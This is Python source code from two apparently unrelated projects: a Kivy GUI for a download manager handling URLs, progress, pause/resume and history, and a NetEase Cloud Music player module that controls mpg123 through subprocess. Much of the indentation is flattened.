down_info_label.color = (1, 1, 1, 1)
down_info_label.font_size = dp(25)
down_info_no_label = MDLabel(text="0", font_name="Assets/fonts/FiraCode-Bold.ttf", size_hint=(.1, 1))
down_box.add_widget(down_info_no_label)
down_info_no_label.color = (1, 1, 1, 1)
down_info_no_label.font_size = dp(15)
left = MDIconButton(icon="arrow-left-bold-hexagon-outline", on_press=self.open_finished_download_screen)
down_box.add_widget(left)
holder_bx.add_widget(down_box)
scroll_all = ScrollView()
scroll_all.bar_color = "298AFF"
scroll_all.bar_width = 5
scroll_all.do_scroll_y = True
self.error_downloads_box = BoxLayout(orientation="vertical", size_hint=(1, None))
# adding widgets
self.error_downloads_screen.add_widget(holder_bx)
holder_bx.add_widget(scroll_all)
scroll_all.add_widget(self.error_downloads_box)
def mini_update(delta_t):
str(delta_t)
down_info_no_label.text = str(self.errors)
Clock.schedule_interval(mini_update, 1 / 99999999999)
def help_tab_init(self):
help_tab = Screen(name="help")
self.manager.add_widget(help_tab)
        self.back_hp = Button(text="Back", on_press=lambda obj: self.change_tab("home"), size_hint=(None, None))
self.back_hp.background_normal = ""
self.back_hp.height = dp(50)
self.back_hp.width = dp(200)
self.back_hp.pos_hint = {'x': 0, 'y': .93}
help_tab.add_widget(self.back_hp)
help_tab.add_widget(Image(source="Assets/Media/help.png", size_hint=(None, None), height=dp(50),
width=dp(50), pos_hint={'x': .21, "y": .93}))
help_tab.add_widget(
Label(text="Help", size_hint=(None, None), size=(dp(150), dp(50)), font_size=40, halign="left",
font_name="Assets/Fonts/Roboto-Light.ttf", pos_hint={"x": .25, "y": .93}))
def change_tab(self, tab):
if tab == "home":
if not affirm_settings():
save_new_settings_query()
elif affirm_settings():
self.manager.current = tab
elif tab == "history":
self.manager.current = tab
else:
self.manager.current = tab
def app_essentials_update(self, delta_t):
str(delta_t)
"""The customized tabs labels that show the stats"""
all_label.text = str(self.downloads + self.errors + self.paused + self.finished)
downloading_label.text = str(self.downloads)
paused_label.text = str(self.paused)
error_label.text = str(self.errors)
finished_label.text = str(self.finished)
# update the downloads box in the mini-tabs
all_downloads_box.height = self.downloads * 100
# themes and colors
self.theme = get_main_theme_color(essence="tuple")
self.drawer.md_bg_color = get_main_theme_color(essence="tuple")
self.enter_bt.background_color = get_sub_theme_color(essence="string")
self.nav_link.background_color = get_transparent_sub_theme_color(essence="string")
self.nav_link.hint_text_color = "#FFFFFF"
self.back_st.background_color = get_transparent_sub_theme_color(essence="string")
self.back_hst.background_color = get_transparent_sub_theme_color(essence="string")
self.back_hp.background_color = get_transparent_sub_theme_color(essence="string")
# info bar statistics
# checking for internet connection
if check_network_connection():
self.con_label.text = "Internet connected"
self.con_label.color = "#298AFF"
else:
self.con_label.text = "No Connection"
self.con_label.color = "#FF0500"
# check for any errors encountered
if self.errors == 1:
self.error_label.color = "#FF0500"
self.error_label.text = str(self.errors) + " Error"
elif self.errors > 1:
self.error_label.color = "#FF0500"
self.error_label.text = str(self.errors) + " Errors"
elif self.errors < 1:
self.error_label.color = "#00920F"
self.error_label.text = "No errors"
# check for any finished procedures
if self.finished > 0:
self.finished_label.text = str(self.finished) + " Finished"
self.finished_label.color = "#298AFF"
elif self.finished == 0:
self.finished_label.color = "#00920F"
self.finished_label.text = "None Finished"
# check for any downloading procedures
if self.downloads > 0:
self.down_label.text = str(self.downloads) + " Downloading.."
self.down_label.color = "#298AFF"
elif self.downloads == 0:
self.down_label.text = "None Downloading"
self.down_label.color = "#00920F"
# check for any paused downloads
if self.paused > 0:
self.paused_label.text = str(self.paused) + " Paused"
self.paused_label.color = "#298AFF"
elif self.paused == 0:
self.paused_label.color = "#00920F"
self.paused_label.text = "None Paused"
def download_popup(self):
self.download_pop = PopupBox(essence="central", title="Input URL", bg_color=get_sub_theme_color("string"),
escape=False)
download_inner = FloatLayout()
download_inner.add_widget(Label(text="Link", size_hint=(None, None), height=dp(25), width=dp(25),
pos_hint={'x': 0, 'y': .75}))
self.url_box = MDTextField(mode="rectangle", hint_text="Paste url here", multiline=False)
self.url_box.background_disabled_normal = ""
self.url_box.font_name = "Assets/Fonts/JetBrainsMono-Thin.ttf"
self.url_box.background_color = '#BECAFF'
self.url_box.background_normal = ""
self.url_box.size_hint = (.6, .2)
self.url_box.pos_hint = {'x': .2, 'y': .75}
        # pressing enter closes the popup and runs the checker
        self.url_box.on_text_validate = lambda: (self.download_pop.exit(), self.checker())
download_inner.add_widget(
Button(text="Paste", size_hint=(None, None), height=dp(30), width=dp(70), pos_hint={'x': .85, 'y': .75},
on_press=lambda obj: self.copy_paste_empty(receiver="url_box", action="paste")))
download_inner.add_widget(self.url_box)
download_inner.add_widget(
Label(text="Directory", size_hint=(None, None), height=dp(25), width=dp(25), pos_hint={'x': .03, 'y': .45}))
self.dir_input = MDTextField(text=p.KeyMatch().match("directory"))
self.dir_input.mode = "rectangle"
self.dir_input.hint_text = "directory"
self.dir_input.multiline = False
self.dir_input.background_normal = ""
self.dir_input.size_hint = (.6, .2)
download_inner.add_widget(
Button(text="Change", size_hint=(None, None), pos_hint={'x': .85, 'y': .45}, height=dp(30),
width=dp(70), on_press=lambda obj: self.change_directory()))
self.dir_input.pos_hint = {'x': .2, 'y': .45}
download_inner.add_widget(self.dir_input)
download_inner.add_widget(
Button(text="Cancel", on_press=lambda obj: self.download_pop.exit(), background_normal="",
background_color="#FF5356", size_hint=(None, None), height=dp(25), pos_hint={'x': 0, 'y': 0},
on_release=lambda obj: self.copy_paste_empty("url_box", action="empty")))
download_enter = Button(on_press=lambda obj: threading.Thread(target=lambda :self.download_pop.exit()).start(), text="Proceed",
background_color="#0976FF", size_hint=(None, None), background_normal="", height=dp(25),
pos_hint={'x': .79, 'y': 0})
        download_enter.bind(on_press=lambda obj: threading.Thread(target=lambda: self.checker()).start())
download_inner.add_widget(download_enter)
self.download_pop.content(content=download_inner)
def copy_paste_empty(self, receiver, action):
if receiver == "nav_link":
if action == "paste":
self.nav_link.text = paste_data()
elif action == "copy":
copy_data(self.nav_link.text)
elif action == "empty":
self.nav_link.text = ""
elif receiver == "url_box":
if action == "paste":
self.url_box.text = paste_data()
elif action == "copy":
copy_data(self.url_box.text)
elif action == "empty":
self.url_box.text = ""
def change_directory(self):
root = tk.Tk()
root.iconbitmap("Assets/Media/downloader.ico")
root.withdraw()
folder = filedialog.askdirectory()
if folder == "" or folder is None:
self.dir_input.text = p.KeyMatch().match("directory")
SnackBar(essence="info", message="Directory reverted to original", bg_color=get_main_theme_color("tuple"))
else:
self.dir_input.text = folder
SnackBar(essence="info", message="Directory changed", bg_color=get_main_theme_color("tuple"))
    def checker(self):
        # looks for the URL in whichever place it was entered, the nav_link
        # text input or the download popup, and also checks for empty input,
        # the internet connection and the validity of the URL itself
        importlib.reload(p)  # refresh the preferences
if not self.nav_link.text and not self.url_box.text:
PopupBox(essence="warn", error_code="URL345", message="Failure: No URL was encountered", beep=True).pop()
elif not check_network_connection(use="external"):
PopupBox(essence="warn", error_code="NT101", message="Failure: No Internet Connection", beep=True).pop()
else:
if self.nav_link.text:
if not check_link_validity(url=self.nav_link.text, use="external"):
PopupBox(essence="warn", error_code="URL201", message="Failure: Invalid URL",
beep=True).pop()
self.nav_link.text = ""
else:
self.confirmer(self.nav_link.text, p.KeyMatch().match("directory"))
self.nav_link.text = ""
elif self.url_box.text:
if not check_link_validity(url=self.url_box.text, use="external"):
PopupBox(essence="warn", error_code="URL202", message="Failure: Invalid URL",
beep=True).pop()
self.url_box.text = ""
else:
self.confirmer(self.url_box.text, self.dir_input.text)
self.url_box.text = ""
def confirmer(self, url, place):
tag = create_random_characters()
identifier = create_random_characters()
pid = create_random_characters()
thread = TellyEngine(url=url, directory=place, tag=tag, identifier=identifier, process_id=pid)
if p.KeyMatch().match("approval"):
affirm = PopupBox(essence="central", title="Approve Download",
bg_color=get_sub_theme_color(essence="string"),
escape=False)
background = BoxLayout(orientation="vertical")
top = BoxLayout()
stat_box = BoxLayout(size_hint=(.75, 1), orientation="vertical")
name_box = BoxLayout()
file_name_label = MDLabel(text="Name: ", size_hint=(.3, 1))
file_name = MDLabel(text="Waiting....")
dir_box = BoxLayout()
dir_name_label = MDLabel(text="Directory: ", size_hint=(.3, 1))
dir_name = MDLabel(text=shorten_string(place, 37))
dir_name.color = "E0E3E6"
link_box = BoxLayout()
link_name_label = MDLabel(text="Link: ", size_hint=(.3, 1))
link_name = MDLabel(text=shorten_string(url, 37))
link_name.color = "E0E3E6"
size_box = BoxLayout()
link_size_label = MDLabel(text="Size: ", size_hint=(.3, 1))
link_size = MDLabel(text="Waiting")
link_size.color = "E0E3E6"
info_box = BoxLayout(size_hint=(.25, 1), orientation="vertical")
pic_box = BoxLayout()
file_icon = Image(size_hint=(.6, .6), pos_hint={'x': 0, 'y': .2})
media_type_box = BoxLayout(size_hint=(1, .3))
media_type_label = Label(text="Waiting....", size_hint=(1, 1))
bottom = BoxLayout(size_hint=(1, .3))
c_cancel = Button(text="Cancel", on_press=lambda obj: affirm.exit(), size_hint=(None, None), height=dp(30),
background_normal="")
c_cancel.background_color = "#FF5356"
c_proceed = Button(text="Proceed",
on_press=lambda obj: threading.Thread(target=lambda :self.init_download(sequence=thread)).start(),
size_hint=(None, None),
background_normal="", on_release=lambda obj: threading.Thread(target=lambda :affirm.exit()).start())
c_proceed.background_color = "#0976FF"
c_proceed.pos_hint = {'x': .8, 'y': 0}
c_proceed.height = dp(30)
def get_essentials():
file_name.text = shorten_string(thread.get_name(), 37)
file_name.color = "E0E3E6"
link_size.text = str(get_standard_size(int(thread.get_size())))
link_size.color = "E0E3E6"
media_type_label.text = thread.get_media()
media_type_label.color = "E0E3E6"
def get_icon():
file_icon.source = check_type(thread.get_media(), thread.get_file_extension())
get_icon()
def update(delta):
str(delta)
get_essentials()
Clock.schedule_interval(update, 1 / 999999999999)
background.add_widget(top)
top.add_widget(stat_box)
name_box.add_widget(file_name_label)
name_box.add_widget(file_name)
dir_box.add_widget(dir_name_label)
dir_box.add_widget(dir_name)
link_box.add_widget(link_name_label)
link_box.add_widget(link_name)
stat_box.add_widget(name_box)
stat_box.add_widget(dir_box)
stat_box.add_widget(link_box)
stat_box.add_widget(size_box)
size_box.add_widget(link_size_label)
size_box.add_widget(link_size)
top.add_widget(info_box)
info_box.add_widget(pic_box)
pic_box.add_widget(file_icon)
info_box.add_widget(media_type_box)
media_type_box.add_widget(media_type_label)
background.add_widget(bottom)
bottom.add_widget(c_cancel)
bottom.add_widget(Widget())
bottom.add_widget(c_proceed)
affirm.pop()
affirm.content(content=background)
elif not p.KeyMatch().match("approval"):
self.init_download(sequence=thread)
def init_download(self, sequence):
if sequence.confirm_existence():
self.add_download_tab("all", sequence)
elif not sequence.confirm_existence():
PopupBox(essence="warn", title="Error Sequence", error_code="SEQ124", message="invalid sequence", beep=True).pop()
def add_download_tab(self, receiver, sequence):
if receiver == "all":
            open(sequence.get_file_location_name(), "w").close()  # create the empty target file
self.start_download(sequence)
all_downloads_box.add_widget(self.all_downloads_downloading_tab(sequence), index=self.downloads - 1)
def start_download(self, sequence):
SnackBar(essence="info", message="Download Started", bg_color=get_main_theme_color("tuple"))
self.downloads += 1
today_date = dt.date.today()
time_now = dt.datetime.now()
self.in_service_pids.append(sequence.get_process_identifier())
detail = {'id': sequence.get_identifier(),
'tag': sequence.get_tag(),
'pid': sequence.get_process_identifier(),
'url': sequence.get_url(),
'name': sequence.get_name(),
'size': sequence.get_size(),
'media': sequence.get_media(),
'secondary_location': "downloading_screen",
'directory': sequence.get_directory(),
'timestamp': {'start_date': f"{today_date:%A, %B %d, %Y}", 'start_time': f"{time_now: %I:%M %p}",
'finish_date': "", 'finish_time': ""}}
p.StorageAPI().add_data(detail)
sequence.download_file()
def init_download_tabs(self):
self.all_downloads_tab.add_widget(all_downloads_bg)
all_paused.bind(on_press=lambda obj: self.change_download_tab("paused"))
all_downloading.bind(on_press=lambda obj: self.change_download_tab("downloading"))
all_finished.bind(on_press=lambda obj: self.change_download_tab("finished"))
all_error.bind(on_press=lambda obj: self.change_download_tab("error"))
self.downloading_tab.add_widget(downloading_bg)
downloading_all.bind(on_press=lambda obj: self.change_download_tab("all"))
downloading_paused.bind(on_press=lambda obj: self.change_download_tab("paused"))
downloading_finished.bind(on_press=lambda obj: self.change_download_tab("finished"))
downloading_error.bind(on_press=lambda obj: self.change_download_tab("error"))
self.paused_download_tab.add_widget(paused_bg)
paused_all.bind(on_press=lambda obj: self.change_download_tab("all"))
paused_downloading.bind(on_press=lambda obj: self.change_download_tab("downloading"))
paused_finished.bind(on_press=lambda obj: self.change_download_tab("finished"))
paused_error.bind(on_press=lambda obj: self.change_download_tab("error"))
self.error_downloads_tab.add_widget(error_bg)
error_all.bind(on_press=lambda obj: self.change_download_tab("all"))
error_downloading.bind(on_press=lambda obj: self.change_download_tab("downloading"))
error_finished.bind(on_press=lambda obj: self.change_download_tab("finished"))
error_paused.bind(on_press=lambda obj: self.change_download_tab("paused"))
self.finished_downloads_tab.add_widget(finished_bg)
finished_all.bind(on_press=lambda obj: self.change_download_tab("all"))
finished_downloading.bind(on_press=lambda obj: self.change_download_tab("downloading"))
finished_error.bind(on_press=lambda obj: self.change_download_tab("error"))
finished_paused.bind(on_press=lambda obj: self.change_download_tab("paused"))
def all_downloads_downloading_tab(self, sequence):
# Downloadtab styling
downloadtab = BoxLayout(orientation="horizontal", )
all_downloads_box.ids[sequence.get_tag()] = downloadtab
downloadtab.spacing = (dp(5), dp(5))
downloadtab.padding = (dp(3), dp(3), dp(3), dp(3))
downloadtab.pos_hint = {'x': 0, 'y': 1}
downloadtab.center_x = 0
downloadtab.size_hint = (1, None)
downloadtab.height = dp(100)
down_bg = MDCard(elevation=15)
down_bg.radius = 0
media_box = BoxLayout(orientation="vertical", size_hint=(.15, 1))
icon_box = BoxLayout(size_hint=(1, .7))
file_icon = Image(source=check_type(sequence.get_media(), sequence.get_file_extension()), size_hint=(.8, .8),
pos_hint={'x': .1, 'y': .1})
media_type_box = BoxLayout(size_hint=(1, .3))
media_type_label = Label(text=sequence.get_media(), size_hint=(1, 1))
info_box = BoxLayout(orientation="vertical", size_hint=(.8, 1))
name_label = MDLabel(text="Waiting...")
name_label.color = "E0E3E6"
direc_label = MDLabel(text=sequence.get_directory())
direc_label.color = "E0E3E6"
progress = MDProgressBar(value=0, max=100, size_hint=(1, .25))
stat_box = BoxLayout(orientation="horizontal")
state_label = MDLabel(text="State: Waiting...", size_hint=(.4, 1))
state_label.color = "E0E3E6"
size_label = Label(text="Size: -- / --", size_hint=(.4, 1), font_name="Assets/Fonts/Lcd.ttf")
speed_label = Label(text="speed: 0mbps", size_hint=(.2, 1), font_name="Assets/Fonts/Lcd.ttf", bold=True)
eta_label = Label(text="4s left", size_hint=(.2, 1))
percent_box = BoxLayout(size_hint=(.05, 1))
percent_label = Label(text="-- %", size_hint=(.05, 1), font_name="Assets/Fonts/Lcd.ttf", bold=True)
button_box = BoxLayout(orientation="vertical", size_hint=(.1, 1))
pause = Button(text="pause")
cancel_bt = Button(text="cancel")
# adding the widgets declared above
downloadtab.add_widget(down_bg)
down_bg.add_widget(media_box)
media_box.add_widget(icon_box)
icon_box.add_widget(file_icon)
media_box.add_widget(media_type_box)
media_type_box.add_widget(media_type_label)
down_bg.add_widget(info_box)
info_box.add_widget(name_label)
info_box.add_widget(direc_label)
info_box.add_widget(progress)
info_box.add_widget(stat_box)
stat_box.add_widget(state_label)
stat_box.add_widget(size_label)
stat_box.add_widget(speed_label)
stat_box.add_widget(eta_label)
down_bg.add_widget(percent_box)
percent_box.add_widget(percent_label)
down_bg.add_widget(button_box)
button_box.add_widget(pause)
button_box.add_widget(cancel_bt)
speed_time = 0
down_finish = False
down_pause = False
def update_tab(delta):
nonlocal speed_time
nonlocal down_finish
nonlocal down_pause
down_bg.md_bg_color = get_sub_theme_color("tuple")
name_label.text = sequence.get_name()
progress.color = (1, 1, 1, 1)
if not check_network_connection(use="internal"):
state_label.text = "State: Network Error"
state_label.color = "#FF0500"
speed_label.text = "- - bytes/s"
elif check_network_connection(use="internal"):
if os.path.getsize(sequence.get_file_location_name()) == sequence.get_size():
state_label.text = "State: Finished"
cancel_bt.on_press = lambda obj: do_nothing()
state_label.color = "#00DFFF"
pause.on_press = lambda obj: do_nothing()
cancel_bt.icon = "check"
pause.icon = "check"
progress.value = 100
percent_label.text = "100 %"
size_label.text = str(
get_standard_size(sequence.get_size()) + "/" + get_standard_size(sequence.get_size()))
state_label.color = "#00DFFF"
speed_label.text = "- - bytes/s"
if not down_finish:
self.finished_download(sequence.get_identifier())
down_finish = True
elif not os.path.getsize(sequence.get_file_location_name()) == sequence.get_size():
if not os.path.exists(sequence.get_error_file()):
state_label.text = "State: Downloading"
state_label.color = "#FFFFFF"
pause.on_press = lambda obj: self.pause_download(sequence.get_identifier(),
sequence.get_error_file())
progress.value = (int(
os.path.getsize(sequence.get_file_location_name())) / int(sequence.get_size())) * 100
percent_label.text = str(int(progress.value)) + " %"
size_label.text = str(
get_standard_size(os.path.getsize(sequence.get_file_location_name()))) + "/ " + str(
get_standard_size(int(sequence.get_size())))
down_pause = False
speed_time += delta
speed_label.text = str(get_standard_size(sequence.get_size() / speed_time)) + "/s"
elif os.path.exists(sequence.get_error_file()):
state_label.text = "State: Paused"
cancel_bt.on_press = lambda obj: do_nothing()
pause.on_press = lambda obj: self.resume_download(sequence)
state_label.color = "#00DFFF"
cancel_bt.disabled = True
pause.text = "Resume"
if not down_pause:
down_pause = True
self.pause_download(sequence.get_identifier(), sequence.get_error_file())
Clock.schedule_interval(update_tab, 1 / 99)
return downloadtab
def pause_download(self, identifier, error_file):
SnackBar(essence="info", message="Download Paused", bg_color=get_main_theme_color("tuple"))
self.downloads -= 1
self.paused += 1
pid = p.StorageAPI().get_unknown(identifier, "pid")
if pid in self.in_service_pids:
            self.in_service_pids.remove(pid)
        if not os.path.exists(error_file):
            # an empty marker file flags the download as paused
            open(error_file, "w").close()
def finished_download(self, identifier):
SnackBar(essence="info", message="Download Completed", bg_color=get_main_theme_color("tuple"))
self.downloads -= 1
self.finished += 1
        process_id = p.StorageAPI().get_unknown(identifier, "pid")
        if process_id in self.in_service_pids:
            self.in_service_pids.remove(process_id)
if p.KeyMatch().match("beep_finish"):
threading.Thread(target=lambda: beep()).start()
else:
pass
def resume_download(self, sequence):
SnackBar(essence="info", message="Download Resumed", bg_color=get_main_theme_color("tuple"))
self.paused -= 1
self.downloads += 1
sequence.resume_download()
if os.path.exists(sequence.get_error_file()):
os.remove(sequence.get_error_file())
def populate_history(self):
for i in p.StorageAPI().get_all_ids():
self.history_tabs(i)
def history_tabs(self, identifier):
history_tab = BoxLayout()
history_tab.spacing = (dp(5), dp(5))
history_tab.padding = (dp(3), dp(3), dp(3), dp(3))
history_tab.center_x = 0
history_tab.size_hint = (1, None)
history_tab.height = dp(100)
pid = p.StorageAPI().get_unknown(identifier, "pid")
self.history_holder.ids[pid] = history_tab
down_bg = MDCard(elevation=15)
down_bg.radius = 0
info_box = BoxLayout(orientation="vertical")
name = p.StorageAPI().get_unknown(identifier, "name")
name_label = MDLabel(text=name)
name_label.color = "E0E3E6"
direc_label = MDLabel(text=p.StorageAPI().get_unknown(identifier, "directory"))
direc_label.color = "E0E3E6"
progress = MDLabel(text=shorten_string(p.StorageAPI().get_unknown(identifier, "url"), 100))
stat_box = BoxLayout(orientation="horizontal")
state_label = MDLabel(text=shorten_string(str(p.StorageAPI().get_unknown(identifier, "media")), 14), size_hint=(.1, 1))
state_label.color = "E0E3E6"
size_label = MDLabel(
text=str(get_standard_size(p.StorageAPI().get_unknown(identifier, "size"))),
size_hint=(.1, 1))
size_label.font_name = "Assets/Fonts/Lcd.ttf"
a = str(p.StorageAPI().get_unknown(identifier, "timestamp")["start_date"]) + str(
p.StorageAPI().get_unknown(identifier, "timestamp")["start_time"])
speed_label = MDLabel(text="Started at:" + a, size_hint=(.35, 1))
eta_label = MDLabel(
text="Finished at:" + str(p.StorageAPI().get_unknown(identifier, "timestamp")["finish_date"] + str(
p.StorageAPI().get_unknown(identifier, "timestamp")["finish_time"])),
size_hint=(.35, 1))
def copy_url():
data = p.StorageAPI().get_unknown(identifier, "url")
multiprocessing.Process(target=lambda :copy_data(data)).start()
SnackBar(essence="info", message="Link has been copied.", bg_color=get_sub_theme_color(essence="tuple"))
def deleting_download(obj):
str(obj)
threading.Thread(target=lambda :self.history_holder.remove_widget(self.history_holder.ids[pid])).start()
multiprocessing.Process(target=lambda: p.StorageAPI().delete_data(identifier)).start()
SnackBar(essence="extra", message="Record Deleted", bg_color=get_sub_theme_color(essence="tuple"))
threading.Thread(target=lambda :self.history_holder.clear_widgets()).start()
threading.Thread(target= lambda :self.populate_history()).start()
def delete_it():
if not p.KeyMatch().match("save_down_proc"):
deleting_download(obj=None)
elif p.KeyMatch().match("save_down_proc"):
box = PopupBox(essence="central", title="Cancel Download",
bg_color=get_sub_theme_color(essence="string"),
escape=False)
def leave(obj):
str(obj)
box.exit()
bg_back = BoxLayout(orientation="vertical")
                bg_label = Label(text="Are you sure you want to delete the records for this download?")
bg_back.add_widget(bg_label)
btn_box = BoxLayout(size_hint=(1, .3))
proc_bt = Button(text="Proceed", on_press=deleting_download, on_release=leave)
canc_bt = Button(text="Cancel", on_press=leave)
btn_box.add_widget(proc_bt)
btn_box.add_widget(canc_bt)
bg_back.add_widget(btn_box)
box.pop()
box.content(bg_back)
bt_box = BoxLayout(size_hint=(.04, 1), orientation="vertical")
url_paste = MDIconButton(icon="content-copy")
url_paste.on_press = copy_url
del_bt = MDIconButton(icon="delete")
del_bt.on_press = delete_it
# adding the widgets declared above
down_bg.add_widget(info_box)
info_box.add_widget(name_label)
info_box.add_widget(direc_label)
info_box.add_widget(progress)
info_box.add_widget(stat_box)
stat_box.add_widget(state_label)
stat_box.add_widget(size_label)
stat_box.add_widget(speed_label)
stat_box.add_widget(eta_label)
down_bg.add_widget(bt_box)
bt_box.add_widget(url_paste)
bt_box.add_widget(del_bt)
history_tab.add_widget(down_bg)
self.history_holder.add_widget(history_tab)
def update_tab(delta_time):
str(delta_time)
down_bg.md_bg_color = get_sub_theme_color("tuple")
Clock.schedule_interval(update_tab, 1 / 9999)
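# A hedged, standalone sketch (not part of the original Telly source): the class
# above repeatedly hands UI callbacks to worker threads with
# threading.Thread(target=...).start(). The toy function below, built around a
# made-up task() helper, illustrates why the callable itself must be passed as
# `target` rather than being called inside Thread(...). It is never called here.
def _thread_target_sketch():
    def task(label):
        print("running", label, "on", threading.current_thread().name)

    # task("eager") would run immediately on the calling thread and hand its
    # return value (None) to Thread() as the `group` argument, so the started
    # thread would do nothing. Passing the callable defers the work instead:
    worker = threading.Thread(target=task, args=("deferred",))
    worker.start()
    worker.join()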
class MainApp(MDApp):
def build(self):
self.title = "Telly Download Manager"
return MainLayout()
if __name__ == "__main__":
MainApp().run()
|
player.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: omi
# @Date: 2014-07-15 15:48:27
# @Last Modified by: AlanAlbert
# @Last Modified time: 2018-11-21 14:00:00
"""
网易云音乐 Player
"""
# Let's make some noise
from __future__ import print_function, unicode_literals, division, absolute_import
import subprocess
import threading
import time
import os
import random
from future.builtins import str
# from ui import Ui
from storage import Storage
from api import NetEase
from cache import Cache
from config import Config
from utils import notify
import logger
log = logger.getLogger(__name__)
class Player(object):
MODE_ORDERED = 0
MODE_ORDERED_LOOP = 1
MODE_SINGLE_LOOP = 2
MODE_RANDOM = 3
MODE_RANDOM_LOOP = 4
def __init__(self):
self.config = Config()
# self.ui = Ui()
self.popen_handler = None
        # stop flag, prevents the playback thread from starting
self.playing_flag = False
self.refrese_url_flag = False
self.process_length = 0
self.process_location = 0
self.storage = Storage()
self.cache = Cache()
self.end_callback = None
self.playing_song_changed_callback = None
self.api = NetEase()
@property
def info(self):
return self.storage.database["player_info"]
@property
def songs(self):
return self.storage.database["songs"]
@property
def index(self):
return self.info["idx"]
@property
def list(self):
return self.info["player_list"]
@property
def order(self):
return self.info["playing_order"]
@property
def mode(self):
return self.info["playing_mode"]
@property
def is_ordered_mode(self):
return self.mode == Player.MODE_ORDERED
@property
def is_ordered_loop_mode(self):
return self.mode == Player.MODE_ORDERED_LOOP
@property
def is_single_loop_mode(self):
return self.mode == Player.MODE_SINGLE_LOOP
@property
def is_random_mode(self):
return self.mode == Player.MODE_RANDOM
@property
def is_random_loop_mode(self):
return self.mode == Player.MODE_RANDOM_LOOP
@property
def config_notifier(self):
return self.config.get("notifier")
@property
def config_mpg123(self):
return self.config.get("mpg123_parameters")
@property
def current_song(self):
if not self.songs:
return {}
if not self.is_index_valid:
return {}
song_id = self.list[self.index]
return self.songs.get(song_id, {})
@property
def playing_id(self):
return self.current_song["song_id"]
@property
def playing_name(self):
return self.current_song["song_name"]
@property
def is_empty(self):
return len(self.list) == 0
@property
def is_index_valid(self):
return 0 <= self.index < len(self.list)
def notify_playing(self):
if not self.current_song:
return
if not self.config_notifier:
return
song = self.current_song
notify(
"正在播放: {}\n{}-{}".format(
song["song_name"], song["artist"], song["album_name"]
)
)
def notify_copyright_issue(self):
log.warning(
"Song {} is unavailable due to copyright issue.".format(self.playing_id)
)
notify("版权限制,无法播放此歌曲")
def change_mode(self, step=1):
self.info["playing_mode"] = (self.info["playing_mode"] + step) % 5
def build_playinfo(self):
if not self.current_song:
return
# self.ui.build_playinfo(
# self.current_song["song_name"],
# self.current_song["artist"],
# self.current_song["album_name"],
# self.current_song["quality"],
# time.time(),
# pause=not self.playing_flag,
# )
def add_songs(self, songs):
for song in songs:
song_id = str(song["song_id"])
self.info["player_list"].append(song_id)
if song_id in self.songs:
self.songs[song_id].update(song)
else:
self.songs[song_id] = song
def refresh_urls(self):
songs = self.api.dig_info(self.list, "refresh_urls")
if songs:
for song in songs:
song_id = str(song["song_id"])
if song_id in self.songs:
self.songs[song_id]["mp3_url"] = song["mp3_url"]
self.songs[song_id]["expires"] = song["expires"]
self.songs[song_id]["get_time"] = song["get_time"]
else:
self.songs[song_id] = song
self.refrese_url_flag = True
def stop(self):
if not self.popen_handler:
return
self.playing_flag = False
self.popen_handler.stdin.write(b"Q\n")
self.popen_handler.stdin.flush()
self.popen_handler.kill()
self.popen_handler = None
        # wait for the process to be killed
time.sleep(0.01)
def tune_volume(self, up=0):
if not self.popen_handler:
return
new_volume = self.info["playing_volume"] + up
if new_volume > 100:
new_volume = 100
elif new_volume < 0:
new_volume = 0
self.info["playing_volume"] = new_volume
self.popen_handler.stdin.write(
"V {}\n".format(self.info["playing_volume"]).encode()
)
self.popen_handler.stdin.flush()
def switch(self):
if not self.popen_handler:
return
self.playing_flag = not self.playing_flag
self.popen_handler.stdin.write(b"P\n")
self.popen_handler.stdin.flush()
self.build_playinfo()
def run_mpg123(self, on_exit, url, expires=-1, get_time=-1):
para = ["mpg123", "-R"] + self.config_mpg123
self.popen_handler = subprocess.Popen(
para, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
self.tune_volume()
self.popen_handler.stdin.write(b"L " + url.encode("utf-8") + b"\n")
self.popen_handler.stdin.flush()
endless_loop_cnt = 0
while True:
if not self.popen_handler:
break
strout = self.popen_handler.stdout.readline().decode("utf-8").strip()
if strout[:2] == "@F":
# playing, update progress
out = strout.split(" ")
self.process_location = int(float(out[3]))
self.process_length = int(float(out[3]) + float(out[4]))
elif strout[:2] == "@E":
self.playing_flag = True
if (
expires >= 0
and get_time >= 0
and time.time() - expires - get_time >= 0
):
                    # the URL has expired, refresh it
self.refresh_urls()
else:
# error, stop song and move to next
self.notify_copyright_issue()
break
elif strout == "@P 0":
# end, moving to next
self.playing_flag = True
break
elif strout == "":
endless_loop_cnt += 1
                # mpg123 sometimes keeps sending empty messages instead of exiting
                # after playback; bail out here to avoid an endless loop and high CPU use
if endless_loop_cnt > 100:
log.warning(
"mpg123 error, halt, endless loop and high cpu use, then we kill it"
)
break
if self.playing_flag:
if self.refrese_url_flag:
self.stop()
self.replay()
self.refrese_url_flag = False
else:
self.next()
else:
self.stop()
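    # A hedged reference helper (not used by the original code): mpg123 in
    # remote-control mode ("-R") reports progress lines of the form
    # "@F <frames-played> <frames-left> <seconds-played> <seconds-left>";
    # run_mpg123() above reads fields 3 and 4 of that line. This tiny parser
    # only documents that format.
    @staticmethod
    def _parse_mpg123_frame(strout):
        # returns (elapsed_seconds, total_seconds) for an "@F" status line
        _, _, _, seconds, seconds_left = strout.split(" ")
        return int(float(seconds)), int(float(seconds)) + int(float(seconds_left))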
    def download_lyric(self, is_translated=False):
        key = "lyric" if not is_translated else "tlyric"
if key not in self.songs[str(self.playing_id)]:
self.songs[str(self.playing_id)][key] = []
if len(self.songs[str(self.playing_id)][key]) > 0:
return
        if not is_translated:
lyric = self.api.song_lyric(self.playing_id)
else:
lyric = self.api.song_tlyric(self.playing_id)
self.songs[str(self.playing_id)][key] = lyric
def download_song(self, song_id, song_name, artist, url):
def write_path(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.add(song_id, song_name, artist, url, write_path)
self.cache.start_download()
def start_playing(self, on_exit, args):
"""
Runs the given args in subprocess.Popen, and then calls the function
on_exit when the subprocess completes.
        on_exit is a callable object, and args is a list/tuple of args
        that would be given to subprocess.Popen.
"""
# log.debug("%s,%s,%s" % (args['song_id'], args['song_name'], args['mp3_url']))
if "cache" in args.keys() and os.path.isfile(args["cache"]):
thread = threading.Thread(
target=self.run_mpg123, args=(on_exit, args["cache"])
)
else:
            new_url = NetEase().songs_url([args["song_id"]])[0]["url"]  # use the freshly fetched URL
            if not new_url:  # if no new URL was returned
                new_url = args["mp3_url"]  # fall back to the old URL and hand it to mpg123
thread = threading.Thread(
target=self.run_mpg123,
